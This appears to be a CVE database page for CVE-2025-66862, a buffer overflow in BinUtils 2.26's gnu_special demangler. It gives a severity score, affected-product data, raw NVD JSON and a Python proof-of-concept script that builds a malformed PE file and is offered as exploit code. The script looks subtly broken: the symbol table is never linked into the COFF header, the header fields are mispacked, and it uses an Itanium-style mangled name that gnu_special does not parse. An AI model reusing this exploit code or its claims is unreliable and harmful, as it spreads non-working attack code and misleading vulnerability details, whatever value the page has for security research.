Security Vulnerability Report
中文
CVE-2025-66862 CVSS 7.5 HIGH

CVE-2025-66862

Published: 2025-12-29 17:15:46
Last Modified: 2026-01-14 19:36:46
Source: [email protected]

Description

A buffer overflow vulnerability in function gnu_special in file cplus-dem.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:* - VULNERABLE
GNU BinUtils 2.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66862 PoC - BinUtils cplus-dem.c Buffer Overflow This PoC generates a malformed PE file that triggers buffer overflow in gnu_special function when processed by BinUtils tools. """ import struct import sys def create_malformed_pe_with_overflow(): """ Create a PE file with crafted C++ mangled symbol that triggers gnu_special buffer overflow in BinUtils 2.26 """ # PE DOS Header dos_header = bytearray(64) dos_header[0:2] = b'MZ' # DOS signature struct.pack_into('<H', dos_header, 60, 64) # e_lfanew offset # PE Signature pe_sig = b'PE\x00\x00' # COFF Header coff_header = bytearray(20) struct.pack_into('<H', coff_header, 0, 0x014c) # Machine: i386 struct.pack_into('<H', coff_header, 2, 1) # NumberOfSections struct.pack_into('<I', coff_header, 12, 224) # SizeOfOptionalHeader struct.pack_into('<H', coff_header, 16, 0x0102) # Characteristics # Optional Header (Minimal) optional_header = bytearray(224) struct.pack_into('<H', optional_header, 0, 0x010b) # Magic: PE32 struct.pack_into('<I', optional_header, 16, 0x1000) # SizeOfCode struct.pack_into('<I', optional_header, 20, 0x1000) # BaseOfCode struct.pack_into('<Q', optional_header, 24, 0x400000) # ImageBase struct.pack_into('<I', optional_header, 32, 0x1000) # SectionAlignment struct.pack_into('<I', optional_header, 36, 0x200) # FileAlignment struct.pack_into('<I', optional_header, 56, 0x10000) # SizeOfImage # Section Header (.text) section_header = bytearray(40) section_header[0:8] = b'.text\x00\x00\x00' struct.pack_into('<I', section_header, 8, 0x1000) # VirtualSize struct.pack_into('<I', section_header, 12, 0x1000) # VirtualAddress struct.pack_into('<I', section_header, 16, 0x200) # SizeOfRawData struct.pack_into('<I', section_header, 20, 0x200) # PointerToRawData struct.pack_into('<I', section_header, 36, 0x60000020) # Characteristics # Crafted symbol table with overflow trigger # The mangled name triggers gnu_special buffer handling issue overflow_trigger = b'_ZN' + b'A' * 1000 + b'E' # Overly long mangled name # Symbol table entry symbol_table = bytearray(18) struct.pack_into('<I', symbol_table, 0, 0) # Name (offset to string) struct.pack_into('<I', symbol_table, 4, 0) # Value struct.pack_into('<H', symbol_table, 8, 0) # SectionNumber struct.pack_into('<H', symbol_table, 10, 0) # Type struct.pack_into('<B', symbol_table, 12, 8) # StorageClass struct.pack_into('<B', symbol_table, 13, 0) # NumberOfAuxSymbols # String table (starts after symbol table) string_table = overflow_trigger + b'\x00' # Combine all parts pe_file = dos_header pe_file += pe_sig pe_file += coff_header pe_file += optional_header pe_file += section_header pe_file += b'\x00' * 0x200 # Padding to file alignment pe_file += symbol_table pe_file += string_table return bytes(pe_file) def main(): print("[*] Generating CVE-2025-66862 PoC PE file...") pe_data = create_malformed_pe_with_overflow() output_file = "cve-2025-66862-poc.exe" with open(output_file, 'wb') as f: f.write(pe_data) print(f"[+] PoC file created: {output_file}") print("[*] To trigger the vulnerability, run:") print(f" nm {output_file}") print(f" objdump -t {output_file}") print("[*] This should cause BinUtils to crash due to buffer overflow") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66862", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:46.100", "lastModified": "2026-01-14T19:36:45.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability in function gnu_special in file cplus-dem.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "7A0BCBA2-7605-4976-8364-E6D1484D0CA9"}]}]}], "references": [{"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash3.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.